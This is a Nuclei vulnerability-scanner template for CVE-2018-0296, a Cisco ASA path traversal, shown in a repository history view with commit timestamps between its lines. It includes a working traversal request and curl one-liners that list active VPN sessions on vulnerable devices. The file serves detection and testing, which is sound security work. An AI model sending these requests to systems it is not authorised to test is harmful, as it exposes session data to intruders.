nuclei-templates/cves/CVE-2018-0296.yaml

24 lines
661 B
YAML
Raw Normal View History

id: cve-2018-0296
2020-04-22 06:42:01 +00:00
info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
# https://github.com/yassineaboukir/CVE-2018-0296
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
2020-05-25 07:49:06 +00:00
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
2020-04-22 06:42:01 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
matchers-condition: and
2020-04-22 06:42:01 +00:00
matchers:
- type: word
words:
2020-05-25 07:49:06 +00:00
- "///sessions"
2020-04-22 06:42:01 +00:00
part: body
- type: status
status:
- 200